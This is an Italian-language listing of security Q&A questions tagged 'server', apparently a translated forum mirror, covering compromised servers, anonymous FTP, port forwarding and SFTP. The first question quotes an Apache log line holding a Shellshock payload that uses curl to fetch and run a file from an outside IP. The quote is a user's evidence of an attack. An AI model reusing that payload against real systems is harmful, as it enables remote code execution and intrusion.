Domande con tag 'server'

domande con tag
1
risposta

I registri di Apache mostrano l'esecuzione dei comandi

Mi chiedo se il mio server è compromesso o meno. Ho appena guardato il mio log e ho visto la seguente riga: IP: 173.249.4.160, Date: 27-12-17, Time:09:52:51, Browser: () { :;}; /bin/bash -c "curl -o /tmp/zmuie http://162.243.117.130/zmuie;/u...
posta 28.12.2017 - 20:24
1
risposta

È possibile che un utente malintenzionato registri le mie sequenze di tasti su un server Linux che non ha un sistema X window?

assumendo quanto segue: server Web raggiungibile pubblicamente - amministrato tramite SSH nessun sistema X window installato e nessun inoltro X11 tramite SSH attacker ha ottenuto l'accesso ed è in grado di eseguire una shell come un norm...
posta 06.12.2017 - 07:48
2
risposte

Se l'applicazione web per i metodi PUT e DELETE restituisce la stessa risposta di GET

La mia applicazione web per i metodi PUT, DELETE e qualsiasi metodo junk HTTP restituisce la stessa risposta del metodo GET (pagina principale html, nulla viene caricato o cancellato), per TRACE c'è la risposta 405. È insicuro? Molte risorse con...
posta 30.11.2017 - 17:36
1
risposta

Un utente FTP anonimo è sempre a rischio (anche se questo utente non ha accesso a nulla)?

Ho trovato alcuni server FTP in una rete che sembrano consentire l'accesso con un utente FTP anonimo. Ho confermato questo con lo script ftp-anon NSE in Nmap. PORT STATE SERVICE 21/tcp open ftp |_ftp-anon: Anonymous FTP login allow...
posta 01.09.2016 - 13:58
2
risposte

Port-Forwarding non protetto? [chiuso]

Stavo per effettuare il port forwarding per creare un server di gioco con un vecchio PC. Ho scoperto che rende più visibili le cose su Internet. Il port forwarding è una pessima scelta considerando le sue insicurezze? Inoltre, come potrò protegg...
posta 11.10.2016 - 00:04
1
risposta

Connessione a un server compromesso

Ultimamente ci sono stati una serie di discussioni sui siti Web compromessi in cui gli aggressori stanno prendendo il controllo dei server su cui questi siti sono ospitati. In quanto tale, questi server dovrebbero essere trattati come completame...
posta 29.02.2016 - 23:49
3
risposte

Il mio server è stato compromesso? [duplicare]

- grazie a tutti è stato risolto, vedi la mia risposta qui sotto - Ho creato un server Debian / OpenVPN diversi mesi fa per uso privato ma negli ultimi due giorni ho notato qualcosa di estremamente inquietante e strano. Succede solo co...
posta 20.10.2015 - 12:38
2
risposte

Come funziona SFTP? Per favore aiuta qualcuno [chiuso]

Gestiamo un sistema che invia automaticamente un messaggio rapido alla fine di un processo. Ma questi messaggi vengono inviati tramite FTP. Riteniamo che il processo FTP sia troppo incline a MITMA e desideriamo cambiare il mezzo di trasmissione...
posta 24.06.2016 - 17:58
2
risposte

Verifica client con server

Attualmente sto progettando un programma Java di base che utilizza i socket per comunicare da un server a più client. Voglio che i client non siano modificati, tuttavia, per evitare che gli utenti provano a utilizzare il software, non come è sta...
posta 09.07.2015 - 23:20
2
risposte

La posizione in cui metto i miei certificati PKI è importante?

Ho un certificato PKI intermedio e root che vedo già importato in un archivio di certificati di computer (Windows Server 2003). Tuttavia, sia i certificati intermedi che quelli radice sono stati collocati nella cartella dei certificati 'Autorità...
posta 13.08.2014 - 23:03